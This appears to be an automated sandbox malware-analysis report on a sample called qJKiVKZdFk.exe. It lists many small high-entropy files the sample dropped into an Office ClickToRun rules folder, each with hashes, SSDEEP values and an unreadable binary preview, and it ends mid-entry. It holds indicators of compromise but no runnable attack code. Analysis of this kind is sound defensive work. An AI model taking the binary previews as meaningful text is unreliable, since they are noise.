                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?|7B[1..*M.n./}.+r.=Py...PS..>..|.`h.....@.+..~...w.^..E2..l.~......^.q1....+....p@.....R"....h..r..3....<^.F..0.k.....o..O,.w..U3.{.%.oY.G.;...O.j..I..)0.....hb.........0N.......4[KN..1..U7..u.2<..w..o9.y50.^....^$X..8.?..I..O..u.t..<..^...........5..b`.!.m).55mi.i.&V.&/..y..K.:bt.U..eX.?".W. 0".....s....(...,k.1..(...|...X..=!.b......e.....e.,9.l..8BZ.3.....1R.b....^..O..q....H0G.Y>(.!...F........0H.Lt.9.y4._..<G-D......../R.=u..J....n..=?.....3bV..Dr6...5.;.l.k.....\..K..'.x..F.'.%%*A.N&...H5..{6...u-.=.i......^.4f..a.Q#.u...o...v..x...i.I/b_...qJ....b...^.4..J..Uk...1/..k&z...".n.......I>.<..}......V.X....[.......Z.Tc..+.#B{...&M...l.j..D....K`.=........>+;.......*W39...I...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120633v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753
                                                                                                                                      Entropy (8bit):7.706809383094349
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:X74XJul/60eyNewJQnaT0n8leTQmjbIHCCAZf8F1ZRk0rJIeu6HlvH0f5HukIciD:8QlsKQni0n8leTr6zAGXzJH1HlyibD
                                                                                                                                      MD5:FD1186C1EBDB69FA9B9D9109CE4CF5D8
                                                                                                                                      SHA1:552DEC38F37A6C0868AD0091E9D178277CE00E5E
                                                                                                                                      SHA-256:AA9F6C4C79084F49493B5580264C9CE751DD30E54E5449B4D687ED5F3B989292
                                                                                                                                      SHA-512:795061CCD4B6662771DDF70FE76A9AF30AA01C061FC270E14407877DFDDE8751D2EAA4B008386052180EFFE86CB06569BEC8656832EE617C29B1E62FDA411057
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?f_..C`..G..l..N...x.g5dK..Cf.... ..2...WX..Syp.xW.......8S..._......{{....B]...`\.#.E(..w.T..H^p..'.o.w......./.s9.3.?...4.zh...&.%eg+.x.B.M.....s.+....h......3.<..r.n....!.ie.B.Ll.b.....f....U.b......b>......a.7..`v.^6...@...~..w<E.........b__w8;r:`.t..d...>.[.[_D..:QL.u..%7.../...Z:.V4...-.y.F...........4.q....}../.....R.F.'..P.K\.d.J.:.|.+....]].-.LO..A<.....`..........;.t...@.{F...X..].**h...<.....}y.........(.....{s.....5.U.....p..`.sQ..h@..9....oX.....D...uXF0..F.-.lSw.v...5.z..~.<d./.'5.N.@@........Z..."...D...j[..l..|{".....m.f.1...d.5/Z/..._.]..zh.3...U~..;......Z.Z8....3Z....v...j.%.`:Z.....(..[...6.h.......(....K.N....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120634v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):828
                                                                                                                                      Entropy (8bit):7.753998725428206
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:kewouLfbrBLAW3VtmU7QZva4ZXHO86Dm3LbD:XgnVZwU2vTGDivD
                                                                                                                                      MD5:77A3BBC064CEAED730B4376C4C7D85A4
                                                                                                                                      SHA1:17EEDA8F6299350AB7EC9C5E75986F21FC4C2FDE
                                                                                                                                      SHA-256:5B5F61BD48FB823953A6F6E25F8C77460717CC1A932D112ABBD1062B520522B0
                                                                                                                                      SHA-512:CC051B3467EBA6633F760BA3FCCA37AA2972C4698A42D4D11B9912344788C93D3BAA745942517987428149A7CBCEEB21726A0C78C4277525691E9F0663D616DE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.v.......JiR....;...+..!O.R."W..E.........}.....I..Q".F(...E:.. ".....pQ%..F..2.]'.l.............T..*..42. ..3$)p....7(mY...:..H.)../.ux.....~~x.1....#.+.... R.i4.x.(....k.B.9U.Z..e........D1.f......|..x.{....q.I.*q0.>3s..DlT...+...S.g.....N...Q...Q`.....h....._J. .W....t..A4.....QK....^.....rQ......._P..}Pm.....~...v8&k:0......X..u...LZ.B..Hs..u..J.8..w-..Ib6...y...Q`...:...~..Z.s.$nX...s......<..I^..E}T...s..L..3....X+K.XdN7;,Z..f....?....0..Z..i.L.'.@.~"....|...XA.F\...-,.7..{.a.1....%.....~l.....W...d0..f.."0.....[.`.....*.n.#.E1.F......Zy..F..|O..@G.....;.T.V.7..)bw........v7..2.>...!.!..t........a...,...z.....=.y.].E.N...Hu..A.V..1...i&!..........5....xz.KV..+....Ha.|i=.....%Q..3^3GjOe....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120635v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):754
                                                                                                                                      Entropy (8bit):7.719313558992853
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Z7ioMR4yGk6wMojTE8grF85k+d+ga9k3YPymnzkvOAyKQJl7hyMGukIcii9a:ZGqk6rUTE8cqK+d+grW9zkvdyKQJl/bD
                                                                                                                                      MD5:DE3AE115C8EA04B87EB7A0887E4A38B2
                                                                                                                                      SHA1:C0EA038CCD770682FA902099BD8A892C99395D05
                                                                                                                                      SHA-256:0CF1921C268B26FAF995768094764E6425D4576BF5EE50F374222C2F54E4FB23
                                                                                                                                      SHA-512:DEE0DA64DD7722E0878EC252E293B8DB0B0949D5E8BDC7079A57EF75D5440197F3F6105FC1D4679FD403DC18FFE1ADC79FCD66E9322E5C0EBEF6BEAAEC76D2BF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..u..m.a......6_..A":~..:\.&.7..5....|......K..+?0!3...O9...3......1.. ..t..y.j.B..F..}.`.RE.x....t.A...t.y....... ..].?^-b..|.#..yG.#.=v.g..A.9|..~.EN.....>..#..P5c..c5.....[..a.G.P..Q^.]...)....6.g,...Q....w|).j....Mn.^^.`.....H.J.$#?..[.30.+..u......W..-*............s9......k..U..QBU.h.W./L$...Z6%.2?.4.FR;.~r. .Q.8...}P..9HVe..G....f,.Y*#.``.k.t...vW.yG.Bj.hB.E',.I.3....;....k&.....+i6..t.....5..j[>..*D...@.K.rpdc..R......<l.#...uu.......d..b......2..I.}'Y.M....e{.L...0H..j.'..k...N.Q..Z..`..\..m.Lk...g.3-...V.^b..%Y..C........#...f..l.'.D.5.v.F.P....h.H<e#...,.9.[......z^S.,...D....F..[5....V..L6.N......q......K....5.c.d..=tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120636v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):806
                                                                                                                                      Entropy (8bit):7.760735777091261
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:aoyqmilHDjvN9xpDatDMHPSw2THC15xw7uJbD:NyoljjvetYqw0e527CD
                                                                                                                                      MD5:152A5F19C24F72D5CD22ACC5D4736DE1
                                                                                                                                      SHA1:92DE2E05585707E2A8A60C53E5164BE4933E6903
                                                                                                                                      SHA-256:BC77141DAC549BEDC881BE890A497529E27F41E1B7FDD5336D7FE665E2116552
                                                                                                                                      SHA-512:4A740373A0D49968E690C15B804887673A4A07975A04E05798444404B693A1D36893C80D07C26C96C8728EB0A4F6EC6D9ED0491D27AD60B0CDDEB0B56B3C763D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.[..tLRW6....*.5<J..Wm..qd.....dh...`......tw.o`....F..k^.......C..%..bKy./FM....q z= ...5.-...9.?...2.X.k..!.}.y=.zf..g..I...n.....&..}...R.,L..x..!..RS...L.m>y..*....|5.A..+H.1.nP...7$_...~\f..b.2K....46...I.....L8Qcjt.M....5%.R.].'.N....G$..3....[..^...hv.S...R.e.VP...........:.x.%.A@ ..<....[b2...=..].>.NLF.5...*.T(Y...+.&..e..h....h.R.<.+..!.r.....S.h...+.....;.1XL.....hTdX......k...m.M~.Fp..}.....a......._...}w..)~g.....]D.*/...h2.N/\'B4|.$.......Y...0...l(...m.1}...!.%......b.GhQJ...1.a]..J..Z.@.......QG..[?..G.u~.'....#rLlE../..k....?z....1.ZT.=I..&...Y.t...l;K.O..f&6.V....}~.^..Jg\S|g.<.h..G..l...?.Y3+....1./...Y.6....Y....z.......K......T..Q.4.....*.n.....J..`."..u..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120637v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):761
                                                                                                                                      Entropy (8bit):7.678002891951035
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Ty/b21znhjQ1TI7vuv2Ejf55D50bR1ob9ZHa4JlHoeAIT9vtAQBiz2ukIcii9a:TsetjQ1E7c2KfbDaohpRTNtbCxbD
                                                                                                                                      MD5:06A9C0A6321243AAC3B059DF9A434FB5
                                                                                                                                      SHA1:F2489844D5AFC8BC6528811AF1CD51FDDEB303B4
                                                                                                                                      SHA-256:E3CD7FC55510B29A2BAE9217EF95BB5D5EC0BF9F9C5C7E56D7338981C42FAD34
                                                                                                                                      SHA-512:017E665E6412F56CD4894F0F84A5A66F274E0A5BC85DAA5D27B6D595EB0E9A6DE355E14FE0BEB5E191BFDC27D9CE4A2151CD486B746E20AB1E9B7D48F557F71D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?i...`.58c....L...d6..W.$.....,..W......$.........OG..k..F.d.!n/.0.J..4.8`..Z..W`..q=.ea.....Q.T..-."9f..L....m..#.....a.".=....<tt...;4.Cv.@..awK..l..{..k......xi.9....4Aq....10z.tN...=.l...C.\.Ia...2...=.+mK..#u......S2.!,.....\..!....P#(.&...g....(...(..$eE.H$......7B....Vg..86..._J$.4cn.....E........#)J....w..^;g.}.y8...qkP....hB..+....0.e.S.c..!2.Qx4.8/...j....NG................L......].S,T.}..d'...K....Y.&\\b..J\.........q.].}ayc+A.U..=..Gc....Xj....w.d#7y@1..}.n.'...z......$.-.#R.s.....S......L..m.OR...\.d/s..T$?.{...bPg...|..|...._..6..4Z.O.q.....[.L$W..-r...4.Fm.K...E~.....f.D"8f.............][:2b.......J...o.cLS..=.5....D....x...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120638v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):820
                                                                                                                                      Entropy (8bit):7.7469929502144
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zWQ9bh7pBQio3Xn50K1+zFfJc7yBWpzjVWt1x77U6kvOXECYOWZckIoltlg5Quk6:zWQ9NX+NYt25jVWFPYANY7iwvlgVbD
                                                                                                                                      MD5:7AA4C8C99A748498F343688D7239DF4E
                                                                                                                                      SHA1:FE2FD0693572C93BFC344074E2ED2A36AC989699
                                                                                                                                      SHA-256:EEF3232284D113BD5C0053EA05080B0946C99F68631FF53D1D572D4742245762
                                                                                                                                      SHA-512:7358C440AF2BD19406139BDB9D92ABEC7589DE4045B12B918856234E07229A594D998C0CC8C1035C3B72BA6791C77F34CF7C5A63C7D02F1C629AA3741A60A42D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?...7..eq1..*..5.&...qx.....^u5...2..:..f.p....Ra....r...0.Kd'A.G.nG..`.z....U)..Gv....Zx).[.1.j.w...$p...l..1r".:X\.$H&.P...>.......&.vn. l.u.....N.C.x5.O.E.[.).e.?noiz)..B:...A.........><.7Z...i.E.z...&.../...)Vv.:.2M.9X-.%,.....wU....Sh8.7....W.tB3.[..1a.....D...d.L_.....r..L>...X...._|...s.C..h..I..XZ..,..a.L.-.dO...WX....D.....E.f?...Bm.........8.P.K.K...w.c.#......|..s..kHO.$$..*.@...}h...I.jp.\..b.7.z....-........7..e{_.* .]|N..e..`......D...7[....]...-0>.:bI0..@>W.Sc#S-....%..w.A;&.).?#..2Y....;XK..ZO...DZlV6...3.d....s/...(......T".r.NS.L.QG..H..Ra.l..6...1J2.R'.tTyB..y..*{.....#..a;...!.o..j.".fC.:.$My.,..........].X.b*...{...$!.Re.y."............#.\&.Q..X..*...........?....2....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120639v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):757
                                                                                                                                      Entropy (8bit):7.697097978933949
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:R+8jtjjweVsaxYtYpOZaQOiz789J8BRzTY0ONYLA1elv5VM7YWjCgytE1ziSIqDr:XpsdYpOZoK7IGRieA1eHVM7FGvOxiQDr
                                                                                                                                      MD5:03568596AA9092DE742E8D086DA98E30
                                                                                                                                      SHA1:FA960522C8FC82239A5CDAFF3FA58644F0503EF5
                                                                                                                                      SHA-256:6ED8C119D7D7502E7908AC822B770158C23D7125ED7318E7A42DD36E7C92BAE8
                                                                                                                                      SHA-512:9B6BD940E9AB1FF042EE72E8D8B51D199F2A0B1099286B8A96E2277FA584C3120AE879982F9B7B81FF36FB5C224DAB310CEBA2933D8C1DDA125ED594E7CB0559
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?O^,..c.=....:."..!.... ...G...6.7.}..,....5.M.T.S.......!..A...t14.+..I'.oRG..<....6..H5...KD.a.N.......p=.......tY.=.]I.PS..g ...j%M\.c..p.N.g.N..iR.M.....6...F..A........f.[e......FE...yx.F....p..0..U.V........^.........@4_..J.[e.....S.....|...2..UV..i..,....e.|&..}c..GX.9.IZ.U.}_...C."..{fP...H..d.....0(t.+....>.Q_.x).D...j.e.....n....t.e*........`t..iV..f.;./.a(....9../8G..32..@..R...Q......,?./.]rw^<+<...f.... D.t2Rp.xM....j...>.SA...l..Qq..'.....7I.D$;.._..~g.:$T.!...pi...._....e.].{].].bOV.nr>.2W.R.....WM\.b0G.25.I.X..PjSD%w.'.lPF..i..5.p..D..z.0G..._&........M.;J<..;C..z..;.7.$^...x.........qg>..jo9x..r...Qtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120640v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):812
                                                                                                                                      Entropy (8bit):7.756125881628958
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/sAcz73JLY6BT+VrmYM8HeMfzhBmULnjCt8UKhAspCE4bD:MzbJLY69Mrm5ASU/hUEiD
                                                                                                                                      MD5:EE64B622B89AF678D51B12A445ACA258
                                                                                                                                      SHA1:06A8BE6B62B6DDD0D0252BF6A3AB6FAF716A35E7
                                                                                                                                      SHA-256:6C0A1078171C8DB684D5705B9C23B1E5FCD2D1256E46AFFE08C250B097303576
                                                                                                                                      SHA-512:33731731A0E36499CAA2904429E26FB2D6F8247F5E1E647C3BAADF2B1E77426B72E93B220A9F6002EE29AE9CBEAD0399BF1417FCA1471040390398B0672C0CA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?\!.Y..^.".. .#4..*p....@.k9M.(.......W.L..o...Q$..<.........B.).C.._K.kl.m.......Nn>9.M.f.zs.....,....Z0.jO.c)p...>a]}.0}....4.C'..X..( .46.C.y/E..r..Q.2.T.[.j........m.....z.....j..K.j..2.e...>.t..G...G.r5.....@{.:V.....l......@.........Ru..a...:yh..p.)......o.1I....{=..C....W.G.....2.....d..Z9.....X.$..Y.G.kA.s..xrOs%y..,6..'....W.........8....y{..U6......^u..IW.\..(n..4S..K...^.I.(......9.[.}..4.z..p8"..}%._v...p.....<{..]..:....'i5h.V.D;.p..DnE....6m.Lm.^.LLfl...a(.Q...n.$....@.T..,.R.s.K..<...SY...T...:GQ.m.@\I&.......g...c.R...pu..i..9$ .m..o........Y....4q..o....~...$..!..Z.D..0.>s3S..&...g.j_..F..~.W..".I..d...`-..w.....k=....p..$l..M..8.i...d9q..._.U.....bM.....@[.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120641v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):738
                                                                                                                                      Entropy (8bit):7.7101241300892385
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:vv5NY+cCNe75Nl6BSerBDTSOxY3srziYIw1LufVbAUzX8vsu6WgukIcii9a:vXY+cHROSerZCsrGYI2L8NAUAjbD
                                                                                                                                      MD5:460C19D0BA1319DCB4FF778B3839A469
                                                                                                                                      SHA1:58718F4D9883B1094AA7BDFC808C75DA5F5C8053
                                                                                                                                      SHA-256:35418F0B8C02E0AEFBD1941D0A8EA82742D15719BC00970F03092D1E882B91B4
                                                                                                                                      SHA-512:1E158CE5240124B0ACCD8C470D97B5C84440337D71A62385CF24E4E42068367FB2E7420CD47DD62A585B536E9ED292280C228D7D6A25C1C9904398FAB4EB8877
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?{W..W..%.V..B...e...R.Pma....s...X.Y=...gN. ..@".h.C3. ......L.y..ORL..*..t..a@H........{|..._....9...^.j(..K.3u..k..@....q(...I....5.gRN.$AdD.0@..^.j.?....v@..".....C.T[..Yn......6.,}....Q.._...{uK.|S......:...$W...c...S.....e$..<.<i..fW.1C....3.8!U.D.5.ynW..ESQ...B...fm.O...e.|.I.NN.C...........Y.>....l^...G..R..0|.......;...b.<....p6c9.D..h..I..\&RF...'wv..%G7.......\..6..4..&p.I..ACU3.......#.u........&Y....nV.g...y....b.~z..Br TP..&Bz.;.7..h.)........U....A...*.wH_ %M.~&.........$..F'mz....\.h....z...W9.0....R.....,5..)p...bV...).V.i..-..B....i...}....mB.W..!._D...Bv..W.)j`X..j.^;:+..M...z.....%.S[tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120642v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):802
                                                                                                                                      Entropy (8bit):7.74442664109735
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:z1QO4lE3fb3veZfEr0Lq7dCC+L6Arcy2q6bD:yO4S3yZcoR3oVq4D
                                                                                                                                      MD5:15FF6CA18DA71485D8BA4AF005B118A2
                                                                                                                                      SHA1:3E7BEEA4902F959B697A05EAAE8B26EBF1A05628
                                                                                                                                      SHA-256:104D5F8F6A559CCFF3F16D2D60F2AE2262A798AE00ACB5F413CC49265124A11A
                                                                                                                                      SHA-512:C717FA25571BB3F097C8822DB4A0B03FEEE8D29EBCF09CCDCC6DBEF1328CA7F8B46E4989761C572821469A9AE87829E70D560433965979D95077D78B0735A427
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..MRl...W.."H...G..b.5Y....L.O;?...+.f..##.X..#..?....H...E....Y=.'t..o..@.|....=`yy..... .w{.U..\..?..I..,..U.J..n}se..KQ6.0Z.K....h.K3....RZ#[U.M..+b.GVQ.j.-..}..e.x<.].*n..x6..~......h.E...K+..[..X..H..R....u0Z.[.....kn'..t.F.i..b...../..V|}.<......]#...T....lS.].<..5i{.g....._kB..=.V....n.bD.\...2...v.$].-.hy...j,.7.E-..d/.*.!Y...?.....P. .sd./g0!s...;.*p.f...|.`.....j.W[..w>...S..5.[...Ax.j.S`gL_...]...AO.B.!...o.`.....5%....K,.......j.....1M. Q)Y...G...0....$>..~.VJ..U.Z...,..U..0..."........\,;~..N.....e..t...`..r.WY..o.e~!.aL........8>.Y......TwG8....+mt..t.G..!....)z.,........>....z..J..0....M...MN......a.G.......U}F<...c0..).....K...$.e@.jh..*.Hn...TX~>..Zr'W.D...lZ....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120643v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):734
                                                                                                                                      Entropy (8bit):7.6571150166074595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:IW6f2CVQdBNvUAXJO1GFeKcgDAU84qPqTPBPMD9oQF6kgsnZsXCeHPazTJukIciD:IWTdPUAEMckANZPqz52rDZsRMibD
                                                                                                                                      MD5:CEF625E2B90C3DCE8E756D72D6FD46AD
                                                                                                                                      SHA1:A5CE0ECF04CE6B82DB194AC339A46C759E8786C2
                                                                                                                                      SHA-256:CFF2BE44120BFC677E2F37DBAD92E9FCB016C9626389E4766ED4674666B21C5F
                                                                                                                                      SHA-512:135D206D4AAAF80447207C1159C10DDC47B26E0F82CF9402EB0ED1DD08FB2A9911AEB0998148C1D5A8AD4E092DC445500A8667CE8AF3904C1E0FD5BAFE218237
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?1.W.@..E:x.=..p.\A....... fr..Zr.-.x..N8....L...F^..B.oAjE{X_0.jf...Lj=.*....k<.eH.[.......X.U...M3X..$. ..sS?...~.b.....r...F"`....n.>../.8JGA.E....(u.[.......a.s..K.p....>.q@.KX.k..^....4.\Uf7....nU...............\..h.....J.~..U......M..{dL.Z.....8'.g..n..5%....*#\q...$.@I6..;.lS.=j..]..$P....P.?0...b..a'.\u.....|.-T.."k|;UN..j_. W....I.*5~..../>$.....5.8+.2bS.q.^.E...q...g.*.9&..n.b..+]J.s...`...8Vz...A*.3.m.....F.e.F..U....^6.2.(.BX.............>.t........n#.......g..*g..B...i<o..e......G.1.E*f.L.J.G.I.1...>].9.W.|U.@(..M2AI.u1i.3=I..*..t..........4....<.....E j..B.G=B....(..y./v.C.N...L..I.^..)A.T0._.[.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120644v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):813
                                                                                                                                      Entropy (8bit):7.7030762860283595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2TuqWOhfF/auKFDwjW9gwuef9d7GjkwbD:muqhftKFsV4fhqD
                                                                                                                                      MD5:D7B6CF66A18937A60E71529DAD66F735
                                                                                                                                      SHA1:D803A1EF64EF1C884EF2B262242AA882557DF016
                                                                                                                                      SHA-256:554AFBA0F668339ADC41F33FD81A4D678A14C482B8A9C92EB0073BF3F2FDDB9A
                                                                                                                                      SHA-512:460693F2E8746BBC11FAAE2A7156D270BF268AD3B125F21F8CE2B957DB67DC8AAE5C71F86EC2BBC7FF5B03D02D793A8C3F784F06C88257E0CD007A203D591857
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.^.$5\.-}..Q...b.......)....UH..DF.YMSV.o..>='..2...1pO\v..a..7.rLT.8.=By.O..&.p.0..._M.,|VC.e..B.,.P..R..#P0.c.i./......X.95......7.#i...O.mf....4.E.....w,...x.....o...Vu.H......h..i..C..E=$..jf..f...}..!.U............h..2.?I...{......>.&TI%...~..}.d..-w9.. 7.'.r.L../.......;C..kg...#-"..L.....E+......*....M6....wC.hn...f..V.R.G..M..9...Li........|.z...m.f.x..#.cB+a.8..r...a.V....P.#...w.Bn0.)...8.......Mk.1...+.....h...~!L!.UX.UPX1K....h..V.}..`...R..p.'wg.'.[.#...9........G.0.......S9z...e.'N../..M.C..r.sv1G.{...]4...2.L.{v..!...9@..,...F..yP..g.013}..g..8."...Z5c....".K..G:.|..t.>..p..!/.M.r.R}...e.f...V.......~..~...).h..9.R.!..%.[..M8..P...x.......$...b.].=..bE 4.f.P.i.,r\.m....3.9tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120645v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):759
                                                                                                                                      Entropy (8bit):7.710305190556887
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:PJFutK1IYbrM7FhxViDHMyVfJhQi1+SH3W9nykeXTmqguOKKEZJfEVukIcii9a:BFyK15bU5cRMADxnOS0ybD
                                                                                                                                      MD5:3FEE23D460C5A6E58653557332F7290E
                                                                                                                                      SHA1:939C8A47FAEC531D10631D76B557D0E2EC8A14A3
                                                                                                                                      SHA-256:BDD6DDCBB0166372CBFFCE4F2AEF2C34F90652BD68841EE91D3C659709402FE0
                                                                                                                                      SHA-512:026D80FD19BCE7AB415B9B72D1DA3427A1365C535ACAFA0656FF1F5B105C5B9CCFD1DDF39893F7607F30B1CF7C0E863748355B313718E42BD542DE90B44ED349
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?^BZP...........F ...`...V.?G.xI..+....}S......../.....D~...z}.b....D..Z}.G.f.....Q.....3.....T.....]dT..l.M.B...D~.....j..p...~..EH....._.!......y./.P.....U...........T..`.....V..<r.#....9..(#".p...$`H.$J..~.i...Ld{..ti....p..|..]>...0......s.z,.x!'...s..c.he*..j..#.N.Np.>..(9..ol.*.dZ+/8%%k..R.WHmy........C..|...u.R..D..x.!...{_II.....)......~.?,R..1..[.3....\..F...{...zD...r...E(os...g)0(...;..-...!..#DJ.}...K.G.b..Z.rR{q1..O..r....}$..>O.yx...N.0.2...W.1@.{?p7[?...[.}B....;..<1.*..../..._l.....qtH.[/......fH.....h}j}LY4.j.v..[ .L....YI..^.l%n/..&..l..7.B....v..+d.,.so...3|.....H.@9|.C..p/<.BHX...\W.i.O.{.a.6bd.. ...g5!Itp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120646v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):809
                                                                                                                                      Entropy (8bit):7.761679473901077
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:VSIuWfAUCtJ6HUedcGblcFN55QTgCfSgIVUs5gjHDbD:xAUCT2UenbqP6GgIW1DXD
                                                                                                                                      MD5:4B57348F1C0B7B202733D6991F83BB24
                                                                                                                                      SHA1:D76F7070D535BE8F8E5D08BD141378866453EF28
                                                                                                                                      SHA-256:5D7B61650A42BCED4A7645F60BBA9E39B51896310A11C0A3FF410726F0308781
